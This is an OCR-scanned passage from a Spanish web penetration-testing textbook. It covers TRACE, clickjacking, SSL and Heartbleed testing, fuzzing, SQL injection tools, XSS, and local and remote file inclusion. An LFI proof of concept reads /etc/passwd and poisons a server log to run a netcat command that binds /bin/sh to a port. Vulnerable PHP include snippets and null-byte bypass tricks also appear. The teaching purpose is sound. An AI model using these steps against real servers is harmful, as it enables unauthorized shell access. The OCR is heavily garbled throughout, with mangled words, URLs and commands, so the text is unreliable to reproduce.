y  se  reenvie  hacia  el  atacante.  Es  un  metodo  no  sencillo  porque  se  deben  cumplir  dos  condiciones, 
lo  cual  hace  que  no  sea  sencillo  poder  utilizar  esta  via. 
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headers  hex  | 


O  matches 


headers  hex  | 

HTTP/ 1.1  200  OK 

Dat^e!  TJeci,  09  Nov  2011  20:40:00  GIIT 

Server  :  Apache/ 2 ,2.3  i  Re^  Hat)  DAV/2  1.2.27 

Fron^Pagi/ 5. 0.2.2  63  5  PHP/ 5  .  1 .  6  ir,a.d_3S  1/ 2 . 2 . 3  OpenSSL/ O  .  9 . 8)3 
Connection:  close 
Content-Type:  nnessage/ http 


TRACE  /  HTTP/ 1.0  | 

Host:  WWW. 

Coo}%:ie:  F  AB  AD  A  FAB  AD  A  j 

Fia.  3.14:  Cookie  en  el  cucrpo  de  la  respucsta  del  melodo  TRACE. 


request 


TRACE  / 

HTTP/1 . O 

Host:  :  wi 

Cookie  ; 

FABADAFABADA 

response 


Proteccion  contra  Clickjacking 

El  clickjacking,  tambien  conocido  como  U1  Redress  Attack,  es  una  lecnica  que  permite  engaiiar  a 
usuarios  en  Internet.  El  objelivo  de  esta  tecnica  es  que  estos  usuarios  revelen  intormacion  credencial 
o  realicen  acciones  que  no  saben  que  realmente  estan  realizando. 

^•,C6mo  tiinciona?  Consiste  en  cargar  un  sitio  web  externo  en  un  iframe  no  visible,  es  decir,  opacidad 
con  valor  0,  y  poner  debajo  del  iframe  no  visible  elementos  para  que  el  usuario  crea  que  esta  haciendo 
die,  pero  realmente  liene  el  iframe  invisible  encima,  por  lo  que  el  usuario  no  ve  realmente  donde 
esta  haciendo  die. 

Esta  tecnica  es  muy  utilizada  para  enganar  al  usuario  y  que  realice  acciones  como  proporcionar  votos 
en  redes  sociales,  noticias,  robo  de  informacion,  etcetera.  El  auditor  debera  analizar  la  cabecera 
X-Frame-optioiis  para  comprobar  si  un  sitio  es  vulnerable  a  clickjacking. 

Hay  una  variante  para  HTML5  denominada  Cross-Origin  Resource  Sharing,  CORS.  la  cual  permite 
un  tipo  de  ataque  similar  a  clickjacking  recutriendo  al  mencionado  HTiVILS.  Tanto  d  clickjacking, 
como  sus  variantes  en  nuevas  tecnologias  deben  ser  analizadas  y  compiobadas. 


Deteccion  y  explotacion 

Este  apartado  engloba  todas  las  acciones  generales  que  se  pueden  realizar  en  la  auditoria.  La 
deteccion  y  explotacion  es  una  de  las  fases  importantes,  ya  que  es  el  instante  en  d  que  el  auditor 
identificara  y  demostrara  la  posible  existencia  de  vulnerabilidades,  aprovechandose  de  ellas  para 
poder  obtener  un  resultado  positive  en  la  prueba. 

Las  pruebas  que  se  estudiaran  a  continuacion  son  la  realizacion  de  los  analisis  de  seguridad  del 
protocolo  SSL  y  la  manipulacion  de  parametros,  donde  se  estudiaran  tecnicas  tan  interesantes  como 
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SQL  Injection,  Cross-Site  Scripting,  CSRF,  LDAP  Injection,  XPath  Injection,  etcetera.  El  analisis  de 
las  cookies  es  otra  de  las  pruebas  interesantes  donde  se  puede  sacar  mucha  informacion  referente 
a  este  sistema  de  validacion  de  sesion.  Por  ultimo,  se  hablaran  de  otras  tecnicas  de  hacking  web 
que  se  pueden  estudiar  en  OWASP,  y  que  la  mayoria  sigue  estando  en  el  top  ten,  Se  estudiaran  los 
file  inclusion,,  los  path  disclosure,,  la  subida  de  ficheros,  accesos  no  autorizados  a  ciertos  recursos. 
ataques  a  los  puntos  de  entrada.  etcetera. 


Analisis  SSL 

En  esta  prueba  se  debe  probar  la  autenticacion  y  privacidad  de  las  comunicaciones.  Para  ello  se 
deben  realizar  una  serie  de  pruebas  que  verifiquen  el  estado  de  este  protocolo  en  las  comunicaciones 
de  la  organizacion  con  el  exterior.  Se  conocen  diversos  ataques  que  pueden  poner  en  peligro  estas 
dos  premisas,  autenticacion  y  privacidad,  por  lo  que  se  debe  tener  en  cuenta. 

Como  se  ha  visto  en  este  libro  la  heiTamienta  nmap  provee  de  scripts  que  pueden  ejeciitar  pruebas 
para  cubrir  esta  tematica,  pero  ademas  existen  diversos  servicios  en  Intemet  que  pueden  realizar 
estas  pruebas  de  manera  rapida.  Uno  de  estos  servicios  es  SSL  Labs  de  Qualys, 


Overall  Rating 


8(1 


Documentation:  SSL/TLS  Deployment  Best  Practices.  SSL  Server  Rating  Guide,  and  OnenSSL  Cookbook. 


Fig.  3.15:  Resumen  analisis  SSL  en  Qualys 


Mcdiante  el  uso  de  algoritmos  criptograficos  se  cifra  la  infonmacion  que  se  intercambia  entre  cliente 
y  servidor.  por  ello  hay  que  estudiar  el  uso  de  los  algoritmos  criptograficos,  ya  que  algunos  pueden 
ser  no  recomendados  por  ser  debiles.  Mediante  el  uso  del  certificado  se  autentica  la  identidad  de  los 
servidores,  aunque  este  hecho  tambien  es  algo  critico,  ya  que  existen  tecnicas  para  que  este  proceso 
pueda  fallar. 

Las  pruebas  que  se  pueden  llevar  a  cabo  en  un  proceso  de  analisis  de  SSL  son  las  siguientes: 

-  Version  del  protocolo  soportable  en  el  sitio. 

“  Tipos  de  algoritmos  de  cifrado  disponibles. 

-  Integridad  de  los  certificados. 
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-  Verificar  el  acceso  a  rccursos  par  canales  no  seguros. 

-  Ataques  conocidos. 

Siempre  hay  que  recordar  que  pueden  salir  nuevas  vulnerabilidades  en  el  protocolo,  por  lo  que  se 
debenan  anadir  al  listado  de  pniebas  a  realizar. 

En  la  prueba  de  version  del  protocolo  sopoitable  en  el  sitio  se  comprueba  que  versiones  de  SSL  y  TLS 
son  soportadas  por  la  maquina  de  la  organizacion.  Si  se  detecta  la  version  SSL\1  como  soportable 
se  detectarla  una  vulnerabilidad,  ya  que  no  es  recomendable  su  uso.  Un  resiimen  proporcionado  por 
Qtialys,  0  incluso  por  nmap  seria  el  de  la  iinagen.  


Protocols 

TLS  1.2 

Yes 

TLS  1  1 

Yes 

TLS  1.0 

Yes 

SSL  3  2 

Yes 

SSL  2 

I'iO 

This  site  requires  support  for  virtual  SSL  hosting  but  SSL  2  Q  and  SSL  3.0  do  net  support  this  feature 

Fig.  3.16:  Protocolos  soportados  en  el  analisis  de  SSL, 


Los  tipos  de  algoritmos  disponibles  deben  ser  analizados,  y  en  el  caso  de  encontrar  uno  que  fuera 
considerado  debil  indicarlo  en  el  intbrme.  Este  tipo  de  prueba  se  ha  realizado  con  nmap,  aunque 
de  nuevo  Onalys  proporciona  un  nivel  de  detalle  mayor.  El  sei-vicio  de  Oiialys  reahza  ademas  unas 
pruebas  de  hanckhake  con  distintos  navegadores  y  sistemas  operativos,  incluyendo  sistemas  moviles. 

La  inlegridad  de  los  cerlificados  digitales  es  otra  de  las  pruebas  que  se  deben  realizar.  Se  identifica 
la  entidad  emisora  del  certificado  como  de  confianza.  no  ha  lemdo  algun  incidente  de  .segunda 
conocido  La  validez  del  certificado  tambien  debe  ser  comprobada  y  el  tipo  de  algoritmo  de  resumen 
utilizado,  si  es  la  familia  SHA  mejor  que  A4D5.  Ademas,  se  debe  verificar  el  ceritificate  pinning. 

Se  debe  verificar  que  no  se  pueda  acceder  a  recursos  por  canales  no  seguro,  denominado  SSL  Skip. 
En  esta  prueba  se  intenta  verificar  que  todo  clemento  que  debe  estar  bajo  la  capa  SSL  no  pue  a  ser 
accedido  sin  ella. 

En  algunas  ocasiones  una  mala  configuracion  puede  provocar  que  se  pueda  acceder  pot  HTTP,  por 
ejemplo  a  una  cookie,  cuando  lo  deseado  es  que  siempre  sea  a  traves  de  SSL. 

Por  ultimo,  se  debe  verificar  si  la  organizacion  es  vulnerable  a  los  ataques  conocidos  sobie  SSL 
Ataques  conocidos  como  BEAST  o  CRIME,  renegociacion  de  claves  no  seguras.  downgrade,  S 
Hearibleed,  etcetera. 

La  herramienta  de  Qualv.i  proporciona  esta  informacion  de  manera  automatica.  ya  que  ellos  realizan 
dichas  pruebas  en  el  analisis  de  SSL,  por  lo  que  es  altamente  recomendable  su  utilizacion. 


Capitulo  111.  Confeccionando  el  ataque 


Sc  debe  tener  en  cuenta  que  en  muchas  ocasiones  se  deben  juntar  tanto  los  servicios  aiitomaiicos 
con  los  procesos  maniiales.  ya  que  las  herramientas  automaticas  no  siempre  conseguiran  lodos  los 
resnllados. 

Poc:  SSL  Heartbleed,  obligado  a  probarse 

Ha  sido  sin  duda  la  vulnerabilidad  del  ano  2014  con  un  gran  impacto  mediatico  y  una  facilidad 
dc  exposicion  y  explotacion  ditlcil  de  encontrar  en  otras.  Esta  vulnerabilidad  [CVE-20 1 4-0 1 60) 
permile  a  cualquier  usuario  de  Internet  leer  hasta  64  KB  de  memoria  dc  los  sistemas  que  utilizan 
versiones  de  OpenSSL  vulnerables. 

^'.Que  se  puede  sacar  de  ello?  Pues  se  compromete  la  seguridad  de  credenciales.  cookies,  claves 
secretas  que  se  utilizan  para  identificar  proveedores  de  servicios  y  cifrar  el  trafico,  contenido  de 
ficheros  o  correos  electronicos,  etcetera.  En  definitiva  infonnacion  que  pueda  encontrarse  en  la 
memoria  del  proceso  de  OpenSSL. 

Lo  mas  grave  de  esta  vulnerabilidad  es  que  no  solo  afecta  a  los  servidores  web  cuando  protegen 
las  comunicacioncs  con  OpenSSL  para  crear  el  HTTPS,  si  no  que  existen  multitud  de  servicios  que 
iiiilizan  esta  aplicacion  y  que  entonces  son  igual  de  vulnerables  que  el  servidor  web.  Por  ejemplo. 
IlearthleecI  afectara  a  todo  servicio  de  coireo  electronico,  servicio  de  red  privada  virtual  VPN, 
motor  de  base  de  datos  o  panel  de  administracion  de  cualquier  ser\dcio  que  utilice  algunas  dc  las 
librcrias  vulnerables  de  OpenSSL  para  cifrar  la  capa  de  comunicaciones  enlre  el  clicnte  que  realiza 
la  conexion  y  el  servidor. 

Por  ejemplo,  en  proyectos  de  auditoria  despues  de  la  publicacion  del  a  vulnerabilidad  ha  sido  muy 
comun  encontrar  tanto  en  Intranets  como  expuestos  en  Internet  servidores  POP3S,  IklAPS,  CPANEL, 
etcetera,  que  ban  sido  vulnerables  ha  dicho  fallo. 

Aunque,  gracias  al  impacto  mediatico  y  la  criticidad  dc  la  vulnerabilidad,  se  ha  cotTCgido  rapidamente 
en  muchos  servidores  de  Internet,  todavia  existe  gran  cantidad  de  servicios  que  son  vulnerables  a 
dicha  vulnerabilidad.  Por  esta  razon.  en  cualquier  analisis  de  SSL  que  se  realice  se  debera  comprobar 
que  todo  dominio  y  pueito  que  pueda  utilizar  capa  SSL  son  analizados  contra  esta  vulnerabilidad. 

Para  ello  se  puede  utilizar  un  script  denominado  .v.s7/e.s7./;F  y  que  puede  ser  descargado  desde  Githuh 
htt})s://gi(hiib.com/mnsalbas/heartbleed-inasstest/blob/master/ssltest.py.  Otra  de  las  herramientas 
que  pueden  ser  utilizadas  para  comprobar  que  los  dominios  dc  la  auditona  y  servicios  no  son 
vulnerables  es  FOCA,  la  cual  dispone  de  un  plugin  que  a  la  vez  que  se  van  descubriendo  dominios 
y  servicios  se  va  comprobando  si  son  vulnerables. 

Esta  herramienta  se  puede  descargar  desde  la  siguiente  direccion  URL  https ://\\^\n\\elevenpalhs. coni/ 
cs/l nbsAiei  raniien  tas-foca.  litnil. 

Bno  de  los  casos  mas  sonados  por  la  importancia  del  nombre  del  dominio  fue  el  de  Yahoo.  El  mismo 
dia  que  salio  la  vulnerabilidad  se  detecto  esta  vulnerabilidad  en  el  dominio  login.yahoo.coni.  Gracias 
^  esta  vulnerabilidad  se  comprometieron  millones  de  cuentas  de  usuarios  de  Yahoo,  por  lo  que  la 
empresa  luvo  que  emitir  un  comunicado  pidiendo  a  sus  usuarios  que  cambiasen  sus  contrasehas. 
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Fig.  3.17:  Explotacion  cle  Hearlbleed. 


Quiza  la  estrategia  que  utiliza  la  herramienta  FOCA  es  mas  util  para  automatizar  dicho  proceso 
en  una  auditoria.  La  heiTamienta  comprueba  la  vulnerabilidad  para  cada  domimo  enconliado  en 
fase  de  descubrimiento.  Esto  hace  que  el  auditor  pueda  estar  tranquilo  y  saber  que  dicha  pnieba  se 
esta  realizando  por  cada  dominio  que  la  herramienta  descubre,  tal  y  como  puede  visualizaise  en  la 

siguiente  imagen. 


Realmente  han  salido  diversos  o,  incluso,  si.ios  web  que  compraeban  si  b" 

dominio  es  vulnerable  0  no.  Otra  de  las  recomendaciones  es  utibzar  el  p&gra  que 
Este  plugin  o  script  se  denomina  ssl-heartbleed  y  puede  encontrarse  en  la  siguien 

http://nmap.org/nsedoc/scripts/ssl-heartbleedlitml. 
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Fuzzing 

E\ fuzzing  es  una  tecnica  de  testeo  de  software  capaz  de  generar  dales  secuencias  o  aleatorios  a  los 
puntos  de  enlrada  de  una  aplicacion  con  el  objetivo  de  poder  detectar  vulnerabilidades,  y  tambien 
podei-  encontrar  fallos  que  hagan  al  .software  inestable  o  realizar  acciones  con  resultados  erroneos. 
El  investigador  espaiiol  Jose  Miguel  Esparza  hizo  un  gran  Irabajo  investigando  sobre  este  tema  e 
implemenlado  una  herramienta  denominado  Malyhiizz. 

E\  fuzzing  es  utilizado  como  un  complemento  en  el  testing  de  .software,  ya  que  proporciona  acceso 
a  regiones  de  codigo  no  probadas  antes.  El  fuzzing  utiliza  una  combinacion  entre  aleatoriedad  y 
heuristicas  interesantes  para  llevar  a  cabo  las  acciones. 

El  funcionamiento  de  \os  fuzzers  tiene  varias  elapas; 

-  Obtencibn  de  datos.  ^Que  datos  se  quieren  enviar  a  la  aplicacion?  Se  pueden  obtener  de 
un  listado  proporcionado  a  la  heiramienta  o  generar  en  el  instante  de  enviar  los  datos  a  la 
aplicacion. 

-  Envio  dc  datos.  En  funcion  del  medio  para  realizar  el  envio  y  el  ambilo  de  trabajo  del 
fuzzer  se  enviaran  los  datos  a  la  aplicacion. 

-  Analisis.  Tras  enviar  los  datos  y  que  la  aplicacion  haya  procesado  las  entradas  .se  obtienen 
Linas  salidas  que  hay  que  analizar.  El  comportamiento  de  la  aplicacion  debe  ser  analizado 
para  ver  si  el  comportamiento  de  la  aplicacion  es  el  que  se  esperaba. 

En  miichas  ocasiones  se  pueden  detectar  fallos  en  la  aplicacion  que  no  impliquen  un  problema 
de  seguridad.  pero  los/nczc-Ti  pueden  ser  utilizados  para  automatizar  un  conjunto  de  pruebas  que 
piicdan  sacar  a  la  luz  un  fallo  de  seguridad. 

E.xistcn  diversas  tecnicas  de  fuzzing,  las  cuales  se  enumeran  a  continuacion: 

-  Repeticion.  Este  tipo  Ac  fuzzing  se  realiza  cuando.  generalmente,  se  buscan  posibles 
buffer  overflow  en  la  aplicacion.  Consiste  en  ir  probando  el  conjunto  de  enlrada  multiplicado 
por  un  valor  en  cada  ileracion  o  prueba.  con  ello  se  intenta  encontrar  limiles  mal  eonfigurados 
0  mal  implementados.  Este  tipo  Ac  fuzzing  se  siiele  clasificar  en  la  calcgoria  generacibn. 

-  Permiilacibn.  Con  una  palabra  Ac  prueba  como  enlrada  se  van  haciendo  permutaciones  y 
enviando  las  entradas  generadas.  Este  tipo  tambien  se  clasifica  en  la  categoria  de  generacibn. 

Integei  Overflow.  Cuando  una  aplicacion  recibe  un  numero  que  no  puede  manejar.  ya 
sea  porque  esta  fiiera  de  su  rango,  o  porque  se  esperan  valores  positives  y  se  recibe  uno 
negativo,  etcetera,  se  provoca  este  tipo  de  errores.  Esto  puede  derivar  en  un  buffer  overflow. 
Un  ejempio  sencillo  de  esto  seria  la  modificacibn  del  campo  content-length  en  una  peticibn 
HTTP  para  provocar  un  error  ante  una  peticibn  no  esperada. 

Mutacibn.  Este  tipo  pertenece  a  la  categoria  que  tiene  su  propio  nombre,  mutacibn.  Es  un 
metodo  que  tiene  como  principio  una  entrada  valida  y  se  van  realizando  cieitas  mutaciones 
de  los  datos  con  la  intencibn  de  que  sigan  siendo  validas,  pero  inesperadas  para  lograr  un 
objetivo  concrelo. 
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Manipulacion  de  parametros  i  i  \ 

algunas  vulnerabilidades  de  este  apartado  como  SQL,  o  copan  los  p  “  . 

distintos  top  de  vulnerabilidades  que  mas  se  siguen  encontrando  a  dm  de  hoy.  Aunque  tambie 
por  los  efectos  que  estas  vulnerabilidades  produce.!  en  la  nnagen  de  la  empresa. 

Este  tipo  de  pruebas  se  pueden  resumir  en  la  manipulacion  de  toda  la  infortiiacion 

setidor  por  ejemplo  modificando  cabeceras  HTTP,  cookies,  parametros  por  GETy  POST,  etcetera^ 

El  objetivo  es  provocar  u„  mal  compoilamlenlo  en  la  aplicac.bn  j./los 

las  cualps  no  L  diseilada.  Las  pruebas  mas  tipieas  son  las  inyecc, ones  SQL.  LDAP.  XPATH. 
avss-site  sa-ipting,  ejecucion  de  comandos  remotos  o  los  CSPP. 

0,-acle,  PostreSQL,  etcaera. 

A  h!  hrao  de  los  anos  se  han  ido  recogiendo  distintas  tecnicas  de  ataque  como,  por  ejemplo,  \os  blind 
olnveclLes  a  Xb,  inyeedones  basadas  en  arilmdica.  en  emores  „  en  dempos.  ,,Com. 
obteneo  an  indicios  Es  muy  comiin  utilizar  la  comilla  simple  en  los  paramenosque  lecogen  va  or^. 
cS  e, ivo  ncillo  de  provocar  un  error  en  pamalla.  No  rodos  los  serv.dores  nenen  la  d,re 
Z  jL  eZ,°  babilitada  por  lo  que  se  n.ilizan  oir.s  tecnicas  como  las  comparac.ones 
-and  1=1 -y  ~ and  1-1 "  y  comparar  si  el  HTML  obtenldo  cambia.  Son  maneras  sencillasdt  deleclat 

un  SQL  Injection. 

Xd»ael  se  mUtran  ejemplos  de  algunas  irerramientas  reeomend.bles  para  su  nso. 

.  Ilavii.  Es  sin  duda  unos  de  las  incjores  Irerramientas  para  cxplotat  SQL  * 

confieuimr  y  co.r  resultados  muy  buenos.  Generalmente,  en  las  comparat.vas  que  se  real  za 
coro^rhen-amientas  Hovil  sale  ganando  en  muchas  de  ellas.  Esta  henmm.enta  d,s,^on  de 
vei-sion  gratuita  y  comercial.  Las  limitaciones  se  encue.itra.!  en  las  tecnolog.as  a  explota . 

-  SOLmap.  Esta  herramienta  viene  disponible  con  la  suite  Kah  L/mev. 
deteccion  y  explotacion  de  SQLl  Los  resultados  que  se  proporc.onan  son  bastante 
Dispone  de  distintos  modos  de  agiesividad  a  la  liora  de  lealizai  inytcciones. 

-  Bmp  Suite.  Esta  herramienta  ayuda  a  los  auditorcs  funcionando 

el  naveaador  e  Internet.  Tambien  puede  realizar  tunc, ones  de  repeata  yjP'du. 
caso  los^auditores  deben  realizar  las  acciones  manualmente,  aunque  gracas 
mencionadas  anteriormente,  se  ayuda  al  auditor  en  su  tiabajo. 
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-  Aciinetix.  Esta  heiTamienta  no  es  solo  para  SOL  Jnjeciioiu  pero  tiene  una  pane  centrada 
en  esta  vulnerabilidad.  Es  capaz  de  escanear  en  busqueda  de  vulnerabilidades  web  con  un 
ratio  de  deteccion  y  exito  imporlante,  en  comparacion  con  otras  henamientas  del  mercado. 

-  Qiialys.  Esta  herramienta  es  una  de  las  grandes  competidoras  de  Acwietix  y  proporciona 
un  escaneo  mas  global  que  su  competidora.  No  se  centra  solo  en  cl  ambilo  web,  aunque  su 
gran  fuerza  resista  en  este  campo.  Su  ratio  de  deteccion  y  exito  en  lo  detectado  es  comparable, 
y  en  muchos  casos  superado,  al  de  Aciinetix. 

-  ZAProxy.  Esta  herramienta  es  Open  Source^  por  lo  que  a  priori  no  puede  competir  con 
herramientas  como  las  mencionadas  anterionnente.  Es  cierto  que  su  ratio  de  deteccion  y 
exito  es  tambien  muy  aceptable.  Es  la  heiTamienta  de  OWASP  como  escaner  web. 

Todas  estas  herramientas  son  imprescindibles  para  realizar  auditorias  con  un  alto  porcentaje  de 
dxito.  Siempre  hay  que  destacar  que  la  experiencia  del  auditor  y  el  saber  realizar  el  trabajo  manual 
ayudaran,  incluso,  a  que  estas  heiTamientas  tengan  exito  en  ciertas  ocasiones.  A  continuacion  se 
puede  visLializar  un  ejemplo  de  uso  de  Havij,  el  cual  una  vez  detectado  por  el  auditor  un  parametro 
vulnerable  a  SQL  Injection  se  puede  explotar  gracias  a  la  hen'amienta. 


Fig.  3. 19:  Havij  exploiando  un  SOU 


l-a  vulnerabilidad  XSS  proporciona  distintos  riesgos  para  dafiar  al  usuario,  y  en  algunos  casos  la 

fcputacion  de  la  oiganizacion.  ^.Que  se  puede  hacer  con  esta  vulnerabilidad?  Pues.  entie  otias  cosas. 
SC  puede: 

Ataques  de  navegacion.  Se  puede  dirigir  al  usuario  a  los  sitios  que  un  atacante  quiera. 

■  Clickjacking. 
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-  Defacement.  Este  puede  ser  como  alteracion  o  sin  alteracion  del  silio  web. 

Distribucion  de  malware. 

-  Ejecucion  de  codigo  .Javascript,  entendiendose  que  dicho^  codigo  sera  malicioso  o 
recopilara  informacion  interesante  sobre  la  maquina  o  red  de  la  victima. 

-  Ataques  de  phishing. 

-  Robo  de  cookies. 

Otros  vectores  de  ataque  que  abre  son  los  ataques  MITB,  Man  In  The  Bio\vsu,  con  el  que  se  puede 
tomar  el  control  remoto  del  navegador.  Este  tipo  de  vulnerabilidades  utdizandolas  con  otras  ^bien 
nuevos  vectores  de  ataque.  los  cuales  se  van  descubnendo  con  el  paso  del  bempo^  Un  XSS 
navaja  suiza  potencial  en  los  navegadores  de  los  usuarios  o  en  los  seiwidores  de  las  empresas, 

dependiendo  del  tipo  que  sea. 

Existen  bien  diferenciados,  dos  tipos  de  XSS:  el  reflejado  y  el  persistente  El  reflejado  afecta 
solo  a  los  clientes  y  se  basa  en  la  manipulacion  de  un  paranietro  vulnerable  de  una  dueccion  URL 
Cuando  este  link  se  pase  a  una  victima  de  manera  oEiscada,  esta  lo  abrira  y  el  codigo  saipl  se 
ejecuta  en  sii  navegador.  Es  cierto  que  si  el  parametro  es  vulnerable  es  debido  a  que  no  sc  esta 
filtrando  correctamente  por  parte  de  la  aplicacion  web.  y  hoy  en  dia,  ni  por  paite  del  navegador. 

El  XSS  persistente  es  un  codigo  script  que,  generalmente,  queda  legistiado  en  una  base  de  datos 
al  realizL  una  peticion  maliciosa  con  unos  parametros  mal  filtrados.  Entonces  cuando  un  usuano 
acceda  al  sitio  web  y  este  recoja  la  informacion  a  mostrar  de  la  base  de  datos  se  le  piesenta  el  codigo 
script  provocando  el  A'S5  y  ejecutandose  en  el  navegador  de  la  victima.  La  difeiencia  es  clara,  el 
mfle jaio  afecta  solo  al  navegador  de  la  victima  y  son  los  mas  tisuales,  y  los  pers.stentes  se  almacenan 
en  ei  sitio  web  provocando  que  por  eada  usuario  que  acceda  a  ese  recurso  quedc  expuesto  a  un 


Inclusion  local  y  remota 

En  este  apartado  se  tratan  dos  vulnerabilidades  bastante  importaiites  en  las  auditorias.  En  primer 
luizar  se  trata  un  local  file  inclusion,  tambien  conocida  como  LFI.  Esta  vulnerab.lidad  surge  cuai^ 
ersei-vidor  realiza  la  lectura  de  un  fichero  local  a  traves  de  parametros  que  pueden  ser  modificado 
por  un  usuario  malicioso.  De  este  modo  la  direccion  del  archivo  puede  ser  mod.hcada  para  mos  rare 
contenido  de  un  archivo  arbitrario.  Gracias  a  esta  tecnica  un  usuario  malicioso 
la  seguridad  de  todo  el  servidor,  y  provocar  la  lectura  del  codigo  de  la  aplicacion  web.  entie  otn 

cosas. 

Un  LFI  suele  ir  acompanada,  y  en  muchas  ocasiones  son  tratadas  como  algo  similar  o  identico  de  la 
denominada  path  transversal.  Esta  consiste  en  forzar  el  acceso  a  ficheros  y  directorios  q  e  ^.de 
en  el  servidor,  pero  fuera  del  directorio  virtual  de  la  aplicacion  web,  permitiendo  que  un  usuario 
malicioso  pueda  manipular  la  direccion  URL  y  llegar  al  sistema  de  archives  de  la  maquina. 

Los  desarrolladores  web  suelen  utilizar  tlinciones  que  permiten  la  inclusion  de 
que  si  la  recogida  del  valor  en  una  peticion  cae  sobre  este  tipo  de  tunciones,  se  pue 
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inclusion  de  fichero.  En  la  tecnologia  PHP  las  funciones  que  proporeionan  este  tipo  de  ataque  son 
include,  require,  incliide_once  o  require _once. 

Los  desarrolladores  intentan  ofuscar  las  extensiones  para  que  no  se  pueda  saber  de  foiTna  visual  si  un 
parametro  recoge  un  fichero  o  un  valor.  El  truco  del  byte  niilo  permite  reconocer  este  caso,  por  lo  que 
inti-oduciendo  el  valor  de  un  parametro  con  '*yo0()  ’  al  final  del  valor  permite  romper  dicha  extension. 
En  otras  palabras,  si  al  introducir  un  valor  a  un  parametro  en  codigo  se  concatena  con  la  extension 
PHP,  con  este  byte  nulo  se  romperia  dicha  concatenacion  ejecutandose  la  inclusion. 

Los  LFI  pueden  ser  complejos  de  detectar  y  explotai;  pero  cuando  se  detecta  la  posibilidad  en  una 
auditoria  de  encontrarse  con  ellos  se  deben  utilizar,  tanto  herramientas  automatizadas  como  la  parte 
manual  y  la  experiencia  para  poder  explotarlo. 

Los  RFl,  0  remorefile  inclusion,  permiten  la  inclusion  de  ficheros  desde  paginas  web  extemas.  Para 
que  esto  ocuiTa  se  deben  cumplir  varias  condiciones  o  requisites  para  explotar  la  vulnerabilidad. 
Para  que  esta  vulnerabilidad  exista  se  debe  tener  en  cuenta  una  mala  configuracion  y  las  versiones  de 
PHP.  Las  funciones  desde  las  cuales  son  explotables  son  include,  require.  include_once  y  require 
once. 

A  continuacion  se  proporciona  un  ejemplo  rapido  de  RFL. 

<?php 

include  fS_GETHurll  7L' 
include($_GET['url2  ]  .  "\php  "): 


En  el  primer  include,  incluiria  una  pagina  web  externa  sin  ningun  filtro,  por  lo  que  su  explotacion 
cs  trivial.  Por  ejemplo,  si  se  incluye  una  webshell  en  este  parametro  con  cualquier  tipo  de  extension 
scria  interpretada.  Mientras  que  en  el  segtindo  include  se  incluye  la  extension  '‘\PHF^  con  lo  que  no 
sc  pennite  una  inclusion  extenia  tan  sencilla.  Para  solticionar  este  hecho  se  debe  incluir  el  caracter 
"ii''  codificado  en  URL  encode  (%23). 

PoC:  LFI,  un  ejemplo 

En  esta  prueba  de  concepto  se  presenta  el  siguiente  escenario: 

Un  sitio  web  dispone  de  una  vulnerabilidad  LFI.  En  uno  de  sus  recursos  se  encuentra 
codigo  vulnerable,  el  cual  para  ejemplo  se  expone  de  manera  simplificada: 

<?php  inchide($  GET['pa^inad)i  ?>  | 

-  El  usuario  utilizara  la  herramienta  cur!  para  realizar  las  peticiones. 

-  El  recurso  vulnerable  se  encuentra  en  http://dominio.com/poc.php?pagina^XXX. 

Pn  primer  lugar  el  auditor  podria  utilizar  ciertas  herramientas  para  explorar  dicho  parametro,  que  en 
este  caso  esta  por  GET.  Si  se  realiza  manualmente  se  realiza  un  path  transversal  para  comprobar  si 
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es  vulnerable  mediante  la  peticidn  hnp:lldomimoxow/poc.php?pagina-/etc/passmh  si  el  sistema 
estuviera  basado  en 


Fig.  3.20:  Obtencion  del  f\chcvo  pcissmi. 


Una  vez  descubierto  esto  el  auditor  puede  pensar  en  aprovecharse  para  lanzar  una  peticion  para 
obtener  el  log  del  sei-vidor  y  lanzar  un  netcat  en  el  servidor  que  se  quede  a  la  escucha  en  un  puerto 

deteraiinado. 


Para  llevar  a  cabo  la  siguiente  estrategia  se  utiliza  la  siguiente  peticion  Hittp://dommio.com/poc. 

php?pagina=/var/log/aiilhdog&cmd=nc  -I  -p  1 200  -e  /bin/sh  & 


in: 

ltd  .t:t(uuu  d.itrt)  (Jid  r;t(uuu  drtt.1)  Iiroiips  -Idtwuu  drtlri) 

|'.'innx  bt  «1  tiHV  hr  i  hrb  IV  t0:1t):0*.  KST  /.01/  ih-Hb  (.mi.  I. , x 

Is  -nl 
loirt 1  ^ 

^rwxr  xr  x  J  root  root  bU  Dec  Zit 

irwxr-xr-x  Z]  root  rool  H6  dun  H  1  , 

ru  r  r  1  root  root  177  MtUj  10  7011  index.  Mwl 

P  r _ 1  root  root  JO  Dec  7b  Icst.php _ _ _ 

Fiu.  3.21 :  Obtencion  de  una  shell  a  traves  de  la  vulnerabilidad. 


Busqueda  de  Path  Disclosure 

Este  tipo  de  vulnerabilidad  permite  obtener  inrormacion  sobre  rutas  fisicas.  por  lo  que  pueden  ser 
tratadas  como  fugas  de  informacion.  Unfull  path  disclosure  es  una  vulnerabilidad  que  es  provocada 
cuando  un  atacante  genera  un  error  en  la  aplicacion  y  se  muestra  el  error  y  la  ruta  tambien. 

La  explotacion  dc  dicha  vulnerabilidad  pareee  inofensiva,  ya  que  solo  se  esta  proporcionando  el 
directorio  fisico  de  la  aplicacion,  pero  es  sabido  que  cuanta  mas  intomracion  tenga  un  atacan  e  so 
un  sitio,  mas  facil  le  resultara  conseguir  el  objetivo.  Este  tipo  de  vulnerabilidades  se  suelen  coi 
con  otras  denominadas  directoiy  transversal,  que  a  la  vez  van  ligadas.  por  ejemp  o,  con  o 
file  inclusion  o  LFL 

;C6mo  se  pueden  detectar  este  tipo  de  vubierabilidades?  La  forma  clasica  es  provocar 
por  ejemplo,  introduciendo  un  fichero  no  existente  como  parametro  a  un  script  que  tra  j 
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ficheros.  La  aplicacion  devolvera  un  en'or  mostrando,  ademas,  sli  propia  ruta  ITsica  de  trabajo. 
Existeii  diversas  maneras,  incluso  en  algunas  ocasiones  el  codigo  siibido  no  se  encuentra  vcrificado 
y  solamente  con  acceder  al  recurso  se  provoca  un  fallo  proporcionando  esta  infomiacion.  Otras 
veces  en  accesos  a  bases  de  datos  se  provocaii  fallos  que  provocan  estas  fugas,  por  lo  que  se  puede 
ver  que  existen  diversos  modos. 

A  continuacion  se  propone  una  direccion  URL  vulnerable  a  full  path  disclosure,  por  ejemplo  http:// 
dominio.com/index.php? parametro=fichero.  Cuando  el  usuario  cainbia  el  valor  del  parametro  por 
(jwerty,  quedando  la  URL  http\l/dowino.com/index.php?parametro^qwerty,  se  debe  fijar  en  la  salida 
que  proporciona  la  aplicacion  web.  Si  el  usuario  visualiza  algo  similar  al  mensaje  "Fatal  error:  Call 
